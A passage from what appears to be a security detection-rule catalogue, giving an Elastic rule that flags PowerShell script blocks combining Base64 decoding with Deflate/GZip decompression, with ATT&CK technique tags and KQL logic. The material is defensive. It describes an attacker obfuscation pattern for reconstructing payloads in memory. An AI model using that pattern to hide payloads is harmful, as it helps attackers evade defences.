legitimate powershell scripts that reconstruct to a confirmed benign installer, updater, or administrative workflow for the same user and host scope.

t1027
t1059
t1140
windows
elastic

Techniques

T1027
T1059
T1140

Sample rules

PowerShell Suspicious Payload Encoded and Compressed

source: elastic
technicques:
- T1027
- T1059
- T1140

Description

Identifies PowerShell script block content that combines Base64 decoding with .NET decompression (Deflate/GZip). Attackers use this pattern to deobfuscate and reconstruct payloads in memory to evade defenses.

Detection logic

event.category:process and host.os.type:windows and
  powershell.file.script_block_entropy_bits >= 4.5 and
  powershell.file.script_block_text : (
    (
      "System.IO.Compression.DeflateStream" or
      "System.IO.Compression.GzipStream" or
      "IO.Compression.DeflateStream" or
      "IO.Compression.GzipStream"
    ) and
    FromBase64String
  ) and
  not user.id : "S-1-5-18"